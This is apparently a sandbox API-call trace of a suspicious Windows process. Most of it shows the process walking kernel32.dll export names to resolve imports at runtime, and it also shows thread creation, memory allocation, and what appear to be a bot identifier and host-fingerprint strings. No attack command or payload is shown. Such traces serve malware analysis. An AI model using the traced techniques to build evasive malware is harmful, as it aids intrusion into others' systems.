lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.348] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.348] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.348] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.349] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.349] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.349] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.349] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.349] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.349] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.349] lstrcpyA (in: lpString1=0x239e9f4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.349] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.349] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xdea00, lpParameter=0x370000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0178.350] VirtualAlloc (lpAddress=0x0, dwSize=0x210, flAllocationType=0x3000, flProtect=0x4) returned 0x3a0000 [0178.353] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3b0000 [0178.353] VirtualAlloc (lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c0000 [0178.359] lstrlenA (lpString="kernel32.dll") returned 12 [0178.359] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.359] lstrcpyA (in: lpString1=0x2398df4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.359] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.359] lstrcpyA (in: lpString1=0x2398df4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.359] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.359] lstrcpyA (in: lpString1=0x2398df4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.360] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.360] lstrlenA (lpString="ADDATOMA") returned 8 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.360] lstrlenA (lpString="ADDATOMW") returned 8 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.360] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.360] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.360] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.360] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.360] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.360] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.360] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.360] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.360] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.360] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.360] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.360] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.360] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.360] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.360] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.360] lstrcpyA (in: lpString1=0x2398df4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.361] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.361] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.361] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.361] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.361] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.361] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.361] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.361] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.361] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.361] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.361] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.361] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.361] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.361] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.361] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.361] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.361] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.361] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.361] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.361] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.362] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.362] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.362] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.362] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.362] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.362] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.362] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.362] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.362] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.362] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.362] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.362] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.362] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.362] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.362] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.362] lstrlenA (lpString="BEEP") returned 4 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.362] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.362] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.362] lstrcpyA (in: lpString1=0x2398df4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.363] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.363] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.363] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.363] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.363] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.363] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.363] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.363] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.363] lstrcpyA (in: lpString1=0x2398df4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.380] lstrcpyW (in: lpString1=0x2399aa4, lpString2="9cda09f29c354b42" | out: lpString1="9cda09f29c354b42") returned="9cda09f29c354b42" [0178.381] lstrcpyW (in: lpString1=0x2399bc4, lpString2="XDUWTFONO" | out: lpString1="XDUWTFONO") returned="XDUWTFONO" [0178.381] lstrcpyW (in: lpString1=0x239edf4, lpString2="|C_F_505630/523979|" | out: lpString1="|C_F_505630/523979|") returned="|C_F_505630/523979|" [0178.381] lstrcpyW (in: lpString1=0x2399d5c, lpString2="Windows 7 Professional" | out: lpString1="Windows 7 Professional") returned="Windows 7 Professional" [0178.381] lstrcpyW (in: lpString1=0x2399b38, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0178.382] lstrcpyW (in: lpString1=0x2399c50, lpString2="none|" | out: lpString1="none|") returned="none|" [0178.382] lstrlenA (lpString="kernel32.dll") returned 12 [0178.382] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0178.382] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0178.382] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0178.382] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0178.382] lstrlenA (lpString="ADDATOMA") returned 8 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0178.382] lstrlenA (lpString="ADDATOMW") returned 8 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0178.382] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0178.382] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.383] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.383] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.383] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.383] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.383] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.383] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.383] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.383] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.383] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.383] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.383] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.383] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.383] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.383] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.383] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.383] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.383] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.383] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.383] lstrcpyA (in: lpString1=0x2398df8, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.383] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.384] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.384] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.384] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.384] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.384] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.384] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.384] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.384] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.384] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.384] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.384] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.384] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.384] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.384] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.384] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.384] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" 